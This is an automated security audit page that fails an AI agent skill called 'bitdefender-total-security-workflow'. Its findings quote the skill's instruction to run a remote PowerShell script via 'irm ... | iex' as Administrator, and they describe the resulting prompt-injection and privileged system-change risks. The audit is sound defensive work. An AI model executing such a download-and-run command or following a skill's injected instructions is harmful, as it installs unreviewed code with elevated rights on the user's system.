bitdefender-total-security-workflow

Fail

Audited by Snyk on Jun 22, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). These URLs point to an unknown GitHub repo and a raw PowerShell install script (raw.githubusercontent.com) that the skill instructs to run with "irm ... | iex" — executing an unreviewed script from untrusted/low-reputation accounts is a high-risk malware distribution pattern.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 0.85). The workflow’s runtime path ingests outsider-authored free text via the “Quick Start” installer command (irm https://raw.githubusercontent.com/.../install.ps1 | iex), which fetches and executes arbitrary public GitHub raw content that can contain prompt-injection text.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).


MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 0.90). The skill explicitly instructs running PowerShell "as Administrator" and executing a remote install script (irm | iex), plus uses Start-Service and Register-ScheduledTask which require elevated privileges and modify system services/state, so it pushes the agent to perform privileged, system-altering actions.

Issues (4)

E005
CRITICAL

Suspicious download URL detected in skill instructions.

W011
MEDIUM

Third-party content exposure detected (indirect prompt injection risk).

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

W013
MEDIUM

Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level
CRITICAL
Analyzed
Jun 22, 2026, 01:17 PM
Issues
4
Security Audit — snyk — bitdefender-total-security-workflow